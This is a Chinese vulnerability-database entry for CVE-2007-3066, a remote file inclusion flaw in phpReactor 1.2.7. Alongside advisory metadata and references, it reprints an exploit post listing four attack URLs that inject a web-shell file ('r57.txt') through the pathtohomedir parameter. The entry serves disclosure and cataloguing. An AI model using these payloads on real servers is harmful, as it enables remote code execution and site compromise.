php(Reactor)  PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1190340 漏洞类型 未知
发布时间 2007-06-05 更新时间 2007-06-05
CVE编号 CVE-2007-3066 CNNVD-ID CNNVD-200706-056
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://www.securityfocus.com/bid/86091
https://cxsecurity.com/issue/WLB-2007060035
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200706-056
|漏洞详情
php(Reactor)中存在多个PHP远程文件包含漏洞。远程攻击者可以借助提交到inc/中的(1)view.inc.php,(2)users.inc.php,(3)updatecms.inc.php和(4)polls.inc.php文件的pathtohomedir参数一个URL,执行任意的PHP代码。此漏洞不同于CVE-2006-3983。
|漏洞EXP
*******************************************
*phpreactor <===1.2.7 remote file include
*
*url:http://sourceforge.net/projects/phpreactor/
*
*author:titanichacker (egy-virus)
*
*contact: hack-teach.com  &  mohandko.com & tryag.com
*
*bug in :
*
*    /inc/view.inc.php & inc/users.inc.php & inc/updatecms.inc.php & 
inc/polls.inc.php
*
*  include($pathtohomedir."/inc/cms.inc.php");
*
*
*
*
*
*exp===>
*
*http://localhost/phpreactor/inc/view.inc.php?pathtohomedir=r57.txt?
*
*http://localhost/phpreactor/inc/users.inc.php?pathtohomedir=r57.txt?
*
*http://localhost/phpreactor/inc/updatecms.inc.php?pathtohomedir=r57.txt
?
*
*http://localhost/phpreactor/inc/polls.inc.php?pathtohomedir=r57.txt?
*
*and more
*
* thanx
*          cold-zero & mohandko & tryag & xp10 & drbaka & arb-hawk & kof2002 
& ilw0rm
*
*******************************************************

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE! 
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
|受影响的产品
Phpreactor Phpreactor 1.2.7
|参考资料

来源:XF
名称:phpreactor-pathtohomedir-file-include(34674)
链接:http://xforce.iss.net/xforce/xfdb/34674
来源:BUGTRAQ
名称:20070601phpreactor<===1.2.7remotefileinclude
链接:http://www.securityfocus.com/archive/1/archive/1/470241/100/0/threaded
来源:OSVDB
名称:38378
链接:http://osvdb.org/38378
来源:OSVDB
名称:38377
链接:http://osvdb.org/38377
来源:OSVDB
名称:38376
链接:http://osvdb.org/38376
来源:OSVDB
名称:38375
链接:http://osvdb.org/38375
来源:SREASON
名称:2773
链接:http://securityreason.com/securityalert/2773